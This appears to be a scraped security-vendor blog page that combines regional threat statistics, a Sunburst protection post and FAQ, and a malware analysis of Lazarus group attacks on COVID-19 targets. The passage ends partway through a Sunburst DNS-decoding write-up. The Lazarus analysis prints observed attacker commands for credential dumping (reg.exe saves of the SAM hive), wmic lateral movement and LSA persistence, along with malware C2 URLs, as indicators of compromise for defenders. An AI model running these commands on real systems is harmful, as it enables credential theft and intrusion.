!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Vulnerabilities by categories (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Vulnerable services by type (download)

Which services are vulnerable?

  • 3% of vulnerable web servers are related to banking organizations;
  • DBMS and FTP servers are most vulnerable in industrial companies;
  • 3% of all exposed remote management interfaces belong to government bodies, placing them first worldwide.
Statistics on obsolete software in companies of the Middle East region


Obsolete software in the region

Data leaks

Corporate accounts of employees from 253 organizations (from a total of 402) were found in public dumps of compromised third-party services. This indicates that employees use their corporate emails to register on external services, for example, social media networks.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Corporate accounts leakage in the region (download)

The highest numbers

  • More than 50% of those accounts are linked to banking organizations in Turkey;
  • About 48% of such accounts linked to industrial companies are in Saudi Arabia.

If employees use compromised passwords for external services as well as for corporate resources, that information can be used to gain unauthorized access to those resources.

The scope of the Digital Footprint Intelligence Service is not restricted to public sources only – it also tracks the activity of cybercriminals on resources with limited access such as darknet forums and stores. The analyzed data includes demand and offers for credit cards and online banking accounts, insider hiring activities, the sale of compromised corporate accounts and client and employee databases, ongoing bounties for top managers, etc.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Statistics on activity in darknet forums and stores (download)

The majority of the topics and adverts discovered on darknet forums are related to bank card sales. We observed a fall in demand for bank cards in February 2020 after the festive season. The decrease was also caused by global lockdowns related to the COVID-19 pandemic.

Customer traffic in e-commerce has rocketed due to the coronavirus and it has naturally led to an increase in fraudulent activities such as phishing. Offers of online banking accounts and credit cards increased on darknet forums in May.

The dark web and the financial industry

Analysis of shadow activities related to the Middle East financial sector revealed that bank cards of four out of 15 countries were found on sale in darknet stores.

Bank card dumps and numbers (with/without CVV) are in high demand among criminals. Information of this kind can be used both for stealing money, for example, by making purchases in online shops and for money laundering.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of bank cards in darknet stores by country (download)

By Q3 2020, more than 78,000 credit card numbers and corresponding CVV/CVV2s of Middle East banks were found in darknet stores.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of cards by type (download)

Sales of payment cards with CVVs increased in July and August due to the opening of national borders after COVID-19 lockdowns were eased.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of banking cards sold by month (download)

2020. december 23.

How we protect our users against the Sunburst backdoor

What happened

SolarWinds, a well-known IT managed services provider, has recently become a victim of a cyberattack. Their product Orion Platform, a solution for monitoring and managing their customers’ IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom Sunburst backdoor on the networks of more than 18,000 SolarWinds customers, with many large corporations and government entities among the victims.

According to our Threat Intelligence data, the victims of this sophisticated supply-chain attack were located all around the globe: the Americas, Europe, Middle East, Africa and Asia.

After the initial compromise, the attackers appear to have chosen the most valuable targets among their victims. The companies that appeared to be of special interest to the malicious actors may have been subjected to deployment of additional persistent malware.

Overall, the evidence available to date suggests that the SolarWinds supply-chain attack was designed in a professional manner. The perpetrators behind the attack made it a priority to stay undetected for as long as possible: after the installation, the Sunburst malware lies dormant for an extended period of time, keeping a low profile and thwarting automated sandbox-type analysis and detection. Additionally, the backdoor utilizes a sophisticated scheme for victim reporting, validation and upgrading which resembles methods involved in some other notorious supply-chain attacks.

Read more about our research on Sunburst malware here. Additional reports and indicators of compromise are available to our Threat Intelligence Portal customers.

How to protect your organization against this threat

The detection logic has been improved in all our solutions to ensure that our customers remain protected. We continue to investigate this attack using our Threat Intelligence and we will add additional detection logic once they are required.

Our products protect against this threat and detect it with the following names:

  • Backdoor.MSIL.Sunburst.a
  • Backdoor.MSIL.Sunburst.b
  • HEUR:Trojan.MSIL.Sunburst.gen
  • HEUR:Backdoor.MSIL.Sunburst.gen
  • Backdoor.MSIL.Sunburst.b

Screenshot of our TIP portal with one IoCs from the SolarWinds breach

Our Behavior Detection component detects activity of the trojanized library as PDM:Trojan.Win32.Generic.

Our Endpoint Detection and Response (Expert) platform can be helpful in looking for and identifying traces of this attack. The customer can search for Indicators of Compromise (such as hashes or domain names) with an .ioc file or directly with the Threat Hunting interface:

Or, customers can use the IoA Tag, which we have added specifically for this attack:

This rule marks endpoint detections for Sunburst to make it more clearly visible to security officers:

Our Kaspersky Anti-Targeted Attack Platform detects Sunburst traffic with a set of IDS rules with the following verdicts:

  • Trojan.Sunburst.HTTP.C&C
  • Backdoor.Sunburst.SSL.C&C
  • Backdoor.Sunburst.HTTP.C&C
  • Backdoor.Sunburst.UDP.C&C
  • Backdoor.Beacon.SSL.C&C
  • Backdoor.Beacon.HTTP.C&C
  • Backdoor.Beacon.UDP.C&C

Our Managed Detection and Response service is also able to identify and stop this attack by using threat hunting rules to spot various activities that can be performed by the Sunburst backdoor as well as detections from Kaspersky Endpoint Security.

Sunburst / UNC2452 / DarkHalo FAQ
  1. Who is behind this attack? I read that some people say APT29/Dukes?
    At the moment, there are no technical links with previous attacks, so it may be an entirely new actor, or a previously known one that evolved their TTPs and opsec to the point where they can’t be linked anymore. Volexity, who previously worked on other incidents related to this, named the actor DarkHalo. FireEye named them “UNC2452”, suggesting an unknown actor. While some media sources linked this with APT29/Dukes, this appears to be either speculation or based on some other, unavailable data, or weak TTPs such as legitimate domain re-use.
  2. I use Orion IT! Was I a target of this attack?
    First of all, we recommend scanning your system with an updated security suite, capable of detecting the compromised packages from SolarWinds. Check your network traffic for all the publicly known IOCs – see https://github.com/fireeye/sunburst_countermeasures. The fact that someone downloaded the trojanized packages doesn’t also mean they were selected as a target of interest and received further malware, or suffered data exfiltration. It would appear, based on our observations and common sense, that only a handful of the 18,000 Orion IT customers were flagged by the attackers as interesting as were further exploited.
  3. Was this just espionage or did you observe destructive activities, such as ransomware?
    While the vast majority of the high-profile incidents nowadays include ransomware or some sort of destructive payload (see NotPetya, Wannacry) in this case, it would appear the main goal was espionage. The attackers showed a deep understanding and knowledge of Office365, Azure, Exchange, Powershell and leveraged it in many creative ways to constantly monitor and extract e-mails from their true victims’ systems.
  4. How many victims have been identified?
    Several publicly available data sets, such as the one from John Bambenek, include DNS requests encoding the victim names. It should be noted that these victim names are just the “first stage” recipients, not necessarily the ones the attackers deemed interesting. For instance, out of the ~100 Kaspersky users with the trojanized package, it would appear that none were interesting to the attackers to receive the 2nd stage of the attack.
  5. What are the most affected countries?
    To date, we observed users with the trojanized Orion IT package in 17 countries. However, the total number is likely to be larger, considering the official numbers from SolarWinds.
  6. Why are you calling this an attack, when it’s just exploitation? (CNA vs CNE)
    Sorry for the terminology, we simply refer to it as a “supply chain attack”. It would be odd to describe it as a “supply chain exploitation”.
  7. Out of the 18,000 first stage victims, how many were interesting to the attackers?
    This is difficult to estimate, mostly because of the lack of visibility and because the attackers were really careful in hiding their traces. Based on the CNAME records published by FireEye, we identified only two entities, a US government organization and a telecommunications company, who were tagged and “promoted” to dedicated C2s for additional exploitation.
  8. Why didn’t you catch this supply chain attack in the first place?
    That’s a good question! In particular, two things made it really stealthy. The slow communication method, in which the malware lies dormant for up to two weeks, is one of them. The other one is the lack of x86 shellcode; the attackers used a .NET injected module. Last but not least, there was no significant change in the file size of the module when the malicious code was added. We observed two suspicious modules in 2019, which jumped from the usual 500k to 900k for SolarWinds.Orion.Core.BusinessLayer.dll. When the malicious code was first added, in February 2020, the file didn’t change size in a significant manner. If the attackers did this on purpose, to avoid future detections, then it’s a pretty impressive thing.
  9. What is Teardrop?
    According to FireEye, Teardrop is malware delivered by the attackers to some of the victims. It is an unknown memory-only dropper suspected to deliver a customized version of the well-known CobaltStrike BEACON. To date, we haven’t detected any Teardrop samples anywhere.
  10. What made this such a successful operation?
    Probably, a combination of things – a supply chain attack, coupled with a very well thought first stage implant, careful victim selection strategies and last but not least, no obvious connections to any previously observed TTPs.
2020. december 23.

Lazarus covets COVID-19-related intelligence

As the COVID-19 crisis grinds on, some threat actors are trying to speed up vaccine development by any means available. We have found evidence that actors, such as the Lazarus group, are going after intelligence that could help these efforts by attacking entities related to COVID-19 research.

While tracking the Lazarus group’s continuous campaigns targeting various industries, we discovered that they recently went after COVID-19-related entities. They attacked a pharmaceutical company at the end of September, and during our investigation we discovered that they had also attacked a government ministry related to the COVID-19 response. Each attack used different tactics, techniques and procedures (TTPs), but we found connections between the two cases and evidence linking those attacks to the notorious Lazarus group.

Relationship of recent Lazarus group attack

In this blog, we describe two separate incidents. The first one is an attack against a government health ministry: on October 27, 2020, two Windows servers were compromised at the ministry. We were unable to identify the infection vector, but the threat actor was able to install a sophisticated malware cluster on these servers. We already knew this malware as ‘wAgent’. It’s main component only works in memory and it fetches additional payloads from a remote server.

The second incident involves a pharmaceutical company. According to our telemetry, this company was breached on September 25, 2020. This time, the Lazarus group deployed the Bookcode malware, previously reported by ESET, in a supply chain attack through a South Korean software company. We were also able to observe post-exploitation commands run by Lazarus on this target.

Both attacks leveraged different malware clusters that do not overlap much. However, we can confirm that both of them are connected to the Lazarus group, and we also found overlaps in the post-exploitation process.

wAgent malware cluster

The malware cluster has a complex infection scheme:

Infection scheme of the wAgent malware cluster

Unfortunately, we were unable to obtain the starter module used in this attack. The module seems to have a trivial role: executing wAgent with specific parameters. One of the wAgent samples we collected has fake metadata in order to make it look like the legitimate compression utility XZ Utils.

According to our telemetry, this malware was directly executed on the victim machine from the command line shell by calling the Thumbs export function with the parameter:

c:\windows\system32\rundll32.exe C:\Programdata\Oracle\javac.dat, Thumbs 8IZ-VU7-109-S2MY

The 16-byte string parameter is used as an AES key to decrypt an embedded payload – a Windows DLL. When the embedded payload is loaded in memory, it decrypts configuration information using the given decryption key. The configuration contains various information including C2 server addresses, as well as a file path used later on. Although the configuration specifies two C2 servers, it contains the same C2 server twice. Interestingly, the configuration has several URL paths separated with an ‘@’ symbol. The malware attempts to connect to each URL path randomly.

C2 address in the configuration

When the malware is executed for the first time, it generates identifiers to distinguish each victim using the hash of a random value. It also generates a 16-byte random value and reverses its order. Next, the malware concatenates this random 16-byte value and the hash using ‘@’ as a delimiter. i.e.: 82UKx3vnjQ791PL2@29312663988969

POST parameter names (shown below) are decrypted at runtime and chosen randomly at each C2 connection. We’ve previously seen and reported to our Threat Intelligence Report customers that a very similar technique was used when the Lazarus group attacked cryptocurrency businesses with an evolved downloader malware. It is worth noting that Tistory is a South Korean blog posting service, which means the malware author is familiar with the South Korean internet environment:

plugin course property tistory tag vacon slide parent manual themes product notice portal articles category doc entry isbn tb idx tab maincode level bbs method thesis content blogdata tname 

The malware encodes the generated identifier as base64 and POSTs it to the C2. Finally, the agent fetches the next payload from the C2 server and loads it in memory directly. Unfortunately, we couldn’t obtain a copy of it, but according to our telemetry, the fetched payload is a Windows DLL containing backdoor functionalities. Using this in-memory backdoor, the malware operator executed numerous shell commands to gather victim information:

cmd.exe /c ping -n 1 -a 192.[redacted] cmd.exe /c ping -n 1 -a 192.[redacted] cmd.exe /c dir \\192.[redacted]\c$ cmd.exe /c query user cmd.exe /c net user [redacted] /domain cmd.exe /c whoami

Persistent wAgent deployed

Using the wAgent backdoor, the operator installed an additional wAgent payload that has a persistence mechanism. After fetching this DLL, an export called SagePlug was executed with the following command line parameters:

rundll32.exe c:\programdata\oracle\javac.io, SagePlug 4GO-R19-0TQ-HL2A c:\programdata\oracle\~TMP739.TMP

4GO-R19-0TQ-HL2A is used as a key and the file path indicates where debugging messages are saved. This wAgent installer works similarly to the wAgent loader malware described above. It is responsible for loading an embedded payload after decrypting it with the 16-byte key from the command line. In the decrypted payload, the malware generates a file path to proceed with the infection:

  • C:\Windows\system32\[random 2 characters]svc.drv

This file is disguised as a legitimate tool named SageThumbs Shell Extension. This tool shows image files directly in Windows Explorer. However, inside it contains an additional malicious routine.

While creating this file, the installer module fills it with random data to increase its size. The malware also copies cmd.exe’s creation time to the new file in order to make it less easy to spot.

For logging and debugging purposes, the malware stores information in the file provided as the second argument (c:\programdata\oracle\~TMP739.TMP in this case). This log file contains timestamps and information about the infection process. We observed that the malware operators were checking this file manually using Windows commands. These debugging messages have the same structure as previous malware used in attacks against cryptocurrency businesses involving the Lazarus group. More details are provided in the Attribution section.

After that, the malware decrypts its embedded configuration. This configuration data has a similar structure as the aforementioned wAgent malware. It also contains C2 addresses in the same format:

  • hxxps://iski.silogica[.]net/events/serial.jsp@WFRForms.jsp@import.jsp@view.jsp@cookie.jsp
  • hxxp://sistema.celllab[.]com.br/webrun/Navbar/auth.jsp@cache.jsp@legacy.jsp@chooseIcon.jsp@customZoom.jsp
  • hxxp://www.bytecortex.com[.]br/eletronicos/digital.jsp@exit.jsp@helpform.jsp@masks.jsp@Functions.jsp
  • hxxps://sac.najatelecom.com[.]br/sac/Dados/ntlm.jsp@loading.jsp@access.jsp@local.jsp@default.jsp

The malware encrypts configuration data and stores it as a predefined registry key with its file name:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\eventlog\Application\Emulate – [random 2 characters]svc

It also takes advantage of the Custom Security Support Provider by registering the created file path to the end of the existing registry value. Thanks to this registry key, this DLL will be loaded by lsass.exe during the next startup.

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa – Security Packages : kerberos msv1_0 schannel wdigest tspkg pku2u [random 2 characters]svc.drv

Finally, the starter module starts the [random 2 characters]svc.drv file in a remote process. It searches for the first svchost.exe process and performs DLL injection. The injected [random 2 characters]svc.drv malware contains a malicious routine for decrypting and loading its embedded payload. The final payload is wAgent, which is responsible for fetching additional payloads from the C2, possibly a fully featured backdoor, and loading it in the memory.

Bookcode malware cluster

The pharmaceutical company targeted by Lazarus group’s Bookcode malware is developing a COVID-19 vaccine and is authorized to produce and distribute COVID-19 vaccines. We previously saw Lazarus attack a software company in South Korea with Bookcode malware, possibly targeting the source code or supply chain of that company. We have also witnessed the Lazarus group carry out spear phishing or strategic website compromise in order to deliver Bookcode malware in the past. However, we weren’t able to identify the exact initial infection vector for this incident. The whole infection procedure confirmed by our telemetry is very similar to the one described in ESET’s latest publication on the subject.

Bookcode infection procedure

Although we didn’t find the piece of malware tasked with deploying the loader and its encrypted Bookcode payload, we were able to identify a loader sample. This file is responsible for loading an encrypted payload named gmslogmgr.dat located in the system folder. After decrypting the payload, the loader finds the Service Host Process (svchost.exe) with winmgmt, ProfSvc or Appinfo parameters and injects the payload into it. Unfortunately, we couldn’t acquire the encrypted payload file, but we were able to reconstruct the malware actions on the victim machine and identify it as the Bookcode malware we reported to our Threat Intelligence Report customers.

Upon execution, the Bookcode malware reads a configuration file. While previous Bookcode samples used the file perf91nc.inf as a configuration file, this version reads its configuration from a file called C_28705.NLS. This Bookcode sample has almost identical functionality as the malware described in the comprehensive report recently published by Korea Internet & Security Agency (KISA). As described on page 57 of that report, once the malware is started it sends information about the victim to the attacker’s infrastructure. After communicating with the C2 server, the malware provides standard backdoor functionalities.

Post-exploitation phase

The Lazarus group’s campaign using the Bookcode cluster has its own unique TTPs, and the same modus operandi was used in this attack.

  • Extracting infected host information, including password hashes, from the registry sam dump.
  • Using Windows commands in order to check network connectivity.
  • Using the WakeMeOnLan tool to scan hosts in the same network.

After installing Bookcode on September 25, 2020, the malware operator started gathering system and network information from the victim. The malware operator also collected a registry sam dump containing password hashes:

  • exe /c “reg.exe save hklm\sam $temp\~reg_sam.save > “$temp\BD54EA8118AF46.TMP~” 2>&1″
  • exe /c “reg.exe save hklm\system $temp\~reg_system.save > “$temp\405A758FA9C3DD.TMP~” 2>&1″

In the lateral movement phase, the malware operator used well-known methodologies. After acquiring account information, they connected to another host with the “net” command and executed a copied payload with the “wmic” command.

  • exe /c “netstat -aon | find “ESTA” > $temp\~431F.tmp
  • exe /c “net use \\172.[redacted] “[redacted]” /u:[redacted] > $temp\~D94.tmp” 2>&1″
  • wmic /node:172.[redacted] /user:[redacted] /password:”[redacted]” process call create “$temp\engtask.exe” > $temp\~9DC9.tmp” 2>&1″

Moreover, Lazarus used ADfind in order to collect additional information from the Active Directory. Using this utility, the threat actor extracted a list of the victim’s users and computers.

Infrastructure of Bookcode

As a result of closely working with the victim to help remediate this attack, we discovered an additional configuration file. It contains four C2 servers, all of which are compromised web servers located in South Korea.

  • hxxps://www.kne.co[.]kr/upload/Customer/BBS.asp
  • hxxp://www.k-kiosk[.]com/bbs/notice_write.asp
  • hxxps://www.gongim[.]com/board/ajax_Write.asp
  • hxxp://www.cometnet[.]biz/framework/common/common.asp

One of those C2 servers had directory listing enabled, so we were able to gain insights as to how the attackers manage their C2 server:

Attacker files listed on a compromised website

We discovered several log files and a script from the compromised server, which is a “first-stage” C2 server. It receives connections from the backdoor, but only serves as a proxy to a “second-stage” server where the operators actually store orders.

File name Description _ICEBIRD007.dat A log file containing the identifier of victims and timestamps. ~F05990302ERA.jpg Second-stage C2 server address:

hxxps://www.locknlockmall[.]com/common/popup_left.asp Customer_Session.asp Malware control script.

Customer_Session.asp is a first-stage C2 script responsible for delivering commands from the next-stage C2 server and command execution results from the implant. In order to deliver proper commands to each victim, the bbs_code parameter from the implants is used as an identifier. The script uses this identifier to assign commands to the correct victims. Here is how the process of sending an order for a particular victim works:

  1. The malware operator sets the corresponding flag([id]_208) of a specific implant and saves the command to the variable([id]_210).
  2. The implant checks the corresponding flag([id]_208) and retrieves the command from the variable([id]_210) if it is set.
  3. After executing the command, the implant sends the result to the C2 server and sets the corresponding flag.
  4. The malware operator checks the flag and retrieves the result if the flag is set.

Logic of the C2 script

Besides implant control features, the C2 script has additional capabilities such as updating the next-stage C2 server address, sending the identifier of the implant to the next-stage server or removing a log file.

table_nm value Function name Description table_qna qnaview Set [id]_209 variable to TRUE and save the “content” parameter value to [id]_211. table_recruit recuritview If [id]_209 is SET, send contents of [id]_211 and reset it, and set [ID]_209 to FALSE. table_notice notcieview Set [id]_208 and save the “content” parameter value to [id]_210. table_bVoice voiceview If [id]_208 is SET, send contents of [id]_210 and reset it, and set [id]_208 to FALSE. table_bProduct productview Update the ~F05990302ERA.jpg file with the URL passed as the “target_url” parameter. table_community communityview Save the identifier of the implant to the log file. Read the second-stage URL from ~F05990302ERA.jpg and send the current server URL and identifier to the next hop server using the following format:

bbs_type=qnaboard&table_id=[base64ed identifier] &accept_identity=[base64 encoded current server IP]&redirect_info=[base64ed current server URL] table_free freeview Read _ICEBIRD007.dat and send its contents, and delete it. Attribution

We assess with high confidence that the activity analyzed in this post is attributable to the Lazarus group. In our previous research, we already attributed the malware clusters used in both incidents described here to the Lazarus group. First of all, we observe that the wAgent malware used against the health ministry has the same infection scheme as the malware that the Lazarus group used previously in attacks on cryptocurrency businesses.

  • Both cases used a similar malware naming scheme, generating two characters randomly and appending “svc” to it to generate the path where the payload is dropped.
  • Both malicious programs use a Security Support Provider as a persistence mechanism.
  • Both malicious programs have almost identical debugging messages.

Here is a side-by-side comparison of the malware used in the ministry of health incident, and the malware (4088946632e75498d9c478da782aa880) used in the cryptocurrency business attack:

Debugging log from ministry of health case Debugging log of cryptocurrency business case 15:18:20 Extracted Dll : [random 2bytes]svc.drv

15:59:32 Reg Config Success !

16:08:45 Register Svc Success !

16:24:53 Injection Success, Process ID : 544 Extracted Dll : [random 2bytes]svc.dll

Extracted Injecter : [random 2bytes]proc.exe

Reg Config Success !

Register Svc Success !

Start Injecter Success !

Regarding the pharmaceutical company incident, we previously concluded that Bookcode is exclusively used by the Lazarus group. According to our Kaspersky Threat Attribution Engine (KTAE), one of the Bookcode malware samples (MD5 0e44fcafab066abe99fe64ec6c46c84e) contains lots of code overlaps with old Manuscrypt variants.

Kaspersky Threat Attribution Engine results for Bookcode

Moreover, the same strategy was used in the post-exploitation phase, for example, the usage of ADFind in the attack against the health ministry to collect further information on the victim’s environment. The same tool was deployed during the pharmaceutical company case in order to extract the list of employees and computers from the Active Directory. Although ADfind is a common tool for the post-exploitation process, it is an additional data point that indicates that the attackers use shared tools and methodologies.

Conclusions

These two incidents reveal the Lazarus group’s interest in intelligence related to COVID-19. While the group is mostly known for its financial activities, it is a good reminder that it can go after strategic research as well. We believe that all entities currently involved in activities such as vaccine research or crisis handling should be on high alert for cyberattacks.

Indicators of compromise

wAgent

dc3c2663bd9a991e0fbec791c20cbf92      %programdata%\oracle\javac.dat
26545f5abb70fc32ac62fdab6d0ea5b2     %programdata%\oracle\javac.dat
9c6ba9678ff986bcf858de18a3114ef3          %programdata%\grouppolicy\Policy.DAT

wAgent Installer

4814b06d056950749d07be2c799e8dc2    %programdata%\oracle\javac.io, %appdata%\ntuser.dat

wAgent compromised C2 servers

http://client.livesistemas[.]com/Live/posto/system.jsp@public.jsp@jenkins.jsp@tomas.jsp@story.jsp hxxps://iski.silogica[.]net/events/serial.jsp@WFRForms.jsp@import.jsp@view.jsp@cookie.jsp hxxp://sistema.celllab[.]com.br/webrun/Navbar/auth.jsp@cache.jsp@legacy.jsp@chooseIcon.jsp@customZoom.jsp hxxp://www.bytecortex.com[.]br/eletronicos/digital.jsp@exit.jsp@helpform.jsp@masks.jsp@Functions.jsp hxxps://sac.najatelecom.com[.]br/sac/Dados/ntlm.jsp@loading.jsp@access.jsp@local.jsp@default.jsp

wAgent file path

%SystemRoot%\system32\[random 2 characters]svc.drv

wAgent registry path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\eventlog\Application\Emulate - [random 2 characters]svc

Bookcode injector

5983db89609d0d94c3bcc88c6342b354    %SystemRoot%\system32\scaccessservice.exe, rasprocservice.exe

Bookcode file path

%SystemRoot%\system32\C_28705.NLS %SystemRoot%\system32\gmslogmgr.dat

Bookcode compromised C2 servers

hxxps://www.kne.co[.]kr/upload/Customer/BBS.asp hxxp://www.k-kiosk[.]com/bbs/notice_write.asp hxxps://www.gongim[.]com/board/ajax_Write.asp hxxp://www.cometnet[.]biz/framework/common/common.asp hxxps://www.locknlockmall[.]com/common/popup_left.asp

MITRE ATT&CK Mapping.

Tactic

Technique.

Technique Name.        

Execution T1059.003

T1569.002 Command and Scripting Interpreter: Windows Command Shell

System Services: Service Execution Persistence T1547.005

T1543.003 Boot or Logon Autostart Execution: Security Support Provider

Create or Modify System Process: Windows Service Privilege Escalation T1547.005

T1543.003

T1055.001 Boot or Logon Autostart Execution: Security Support Provider

Create or Modify System Process: Windows Service

Process Injection: Dynamic-link Library Injection Defense Evasion T1070.006

T1055.001

T1140

T1027.001 Indicator Removal on Host: Timestomp

Process Injection: Dynamic-link Library Injection

Deobfuscate/Decode Files or Information

Obfuscated Files or Information: Binary Padding Credential Access T1003.002 OS Credential Dumping: Security Account Manager Discovery T1082

T1033

T1049 System Information Discovery

System Owner/User Discovery

System Network Connections Discovery Lateral Movement T1021.002 SMB/Windows Admin Shares Command and Control T1071.001

T1132.001 Application Layer Protocol: Web Protocols

Data Encoding: Standard Encoding Exfiltration T1041 Exfiltration Over C2 Channel

2020. december 18.

Sunburst: connecting the dots in the DNS requests

On December 13, 2020 FireEye published important details of a newly discovered supply chain attack. An unknown attacker, referred to as UNC2452 or DarkHalo planted a backdoor in the SolarWinds Orion IT software. This backdoor, which comes in the form of a .NET module, has some really interesting and rather unique features.

We spent the past days checking our own telemetry for signs of this attack, writing additional detections and making sure that our users are protected. At the moment, we identified approximately ~100 customers who downloaded the trojanized package containing the Sunburst backdoor. Further investigation is ongoing and we will continue to update with our findings.

Now, several things really stand out for this incident. This supply chain attack was designed in a very professional way – kind of putting the “A” in “APT” – with a clear focus on staying undetected for as long as possible. For instance, before making the first internet connection to its C2s, the Sunburst malware lies dormant for a long period, of up to two weeks, which prevents an easy detection of this behavior in sandboxes. Other advanced threat groups are also known to adopt similar strategies, for instance with hardware or firmware implants, which “sleep” for weeks or months before connecting to their C2 infrastructure. This explains why this attack was so hard to spot.

One of the things that sets this apart from other cases, is the peculiar victim profiling and validation scheme. Through the SolarWinds Orion IT packages, the attackers reached about 18,000 customers, according to the SolarWinds alert. Yet, out of these 18.000, it would appear that only a handful were interesting to them. Considering the fact that having the resources to manually exploit 18,000 computer networks is probably outside the reach of most if not all the attackers out there, this leads to the point that obviously some of those would have been a higher priority. Finding which of the 18,000 networks were further exploited, receiving more malware, installing persistence mechanisms and exfiltrating data is likely going to cast some light into the attacker’s motives and priorities.

In the initial phases, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer; if the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server.

Our colleagues from FireEye published several DNS requests that supposedly led to CNAME responses on Github: https://github.com/fireeye/sunburst_countermeasures/blob/main/indicator_release/Indicator_Release_NBIs.csv

DNS CNAME request-response pairs (Copyright 2020 by FireEye, Inc.)

The goal

Knowing that the DNS requests generated by Sunburst encode some of the target’s information, the obvious next step would be to extract that information to find out who the victims are!

Our colleagues from QiAnXin Technology already published a Python script to decode the domain names (on Github, of course): https://github.com/RedDrip7/SunBurst_DGA_Decode/blob/main/decode.py . Unfortunately, that script cannot decode all the DNS requests, besides it is always good to practice in reverse engineering anyway, so let’s look in the malware code.

TL;DR

Three of the requests from FireEye’s Github repository can be mapped to two domain names that belong to a government organization and a telecommunications company in the US.

Low-level details

The sample we’ll be analyzing is 2c4a910a1299cdae2a4e55988a2f102e. All we need is a .NET decompiler (dnSpy is a good one).

The logic that is interesting to us is located in OrionImprovementBusinessLayer.Update, which in turn calls one of the four functions: GetCurrentString, GetPreviousString, GetNextStringEx and GetNextString.

These four functions correspond to four different DNS-based communication methods.

Now, to find out what kind of data is encoded in the DNS requests (the hostname variable) we need to look closer into each one of these functions.

The first function GetCurrentString generates strings that contain a supposedly unique target’s identifier (this.guid), the target’s hostname (this.dnStrLower) and the rest of the hostname that will be in form of “appsync-api.*.avsvmcloud[.]com”. The encoding of the data is done by the functions CreateSecureString and CreateString.

The function GetPreviousString is bigger, but produces a similar hostname for a DNS request. It includes a part of the target’s hostname in the request, so that it would match the limitations on the request length. Each such request also includes the sequence number (this.nCount) that is the offset of the current substring from the beginning of the hostname.

The remaining two functions, GetNextStringEx and GetNextString, generate a different type of DNS requests. They include only the target’s UID, hashes of the running processes of interest and (only in the Ex version) the list and status of these processes. The target’s UID is then encrypted, and the data is encoded with CreateSecureString.

The problem

The encryption used in the malware is just a simple XOR operation, and the encoding is either a substitution cipher or Base32 with a custom alphabet. However, if we reverse the sequence of operations of GetPreviousString or GetCurrentString for the known CNAME DNS requests published by FireEye, the resulting strings don’t look like valid domain names!

A possible explanation is that the requests were generated by the third or fourth communication methods, described as GetNextStringEx or GetNextString. Indeed, they can be decoded without errors and the size of decoded data fits.  However, these requests don’t have the target’s name included!

The solution

At this point, a question arises – can we match any of existing private and public DNS data for the malware root C2 domain, “avsvmcloud[.]com” with the CNAME records, to identify who was targeted for further exploitation?

A list of SUNBURST-generated domain names that include the domain names were kindly shared by John Bambenek on Github: https://github.com/bambenek/research/blob/main/sunburst/uniq-hostnames.txt .

Here’s a few such examples:
nnbggtlr1iv0v3vfnfaddfe.appsync-api.us-west-2.avsvmcloud[.]com
nq97kdu88pn1qpv8f3t5.appsync-api.us-east-1.avsvmcloud[.]com
nr2ia9qfa349b0q2oi60bou6iuir02rn.appsync-api.us-east-1.avsvmcloud[.]com

We complemented John’s data with our own datasets as well as other publicly available pDNS databases. Each one of these DNS requests also has the Base32-encoded UID. Since the UIDs are also included in other types of requests (types 3 and 4) in encrypted form, this allows us to match the requests!

The target’s UID is calculated in OrionImprovementBusinessLayer.GetOrCreateUserID by MD5-hashing the MAC address of the first online network adapter, then XORing it down to 64 bits.

The DNS requests published by FireEye on their GitHub have the following encrypted UIDs inside:

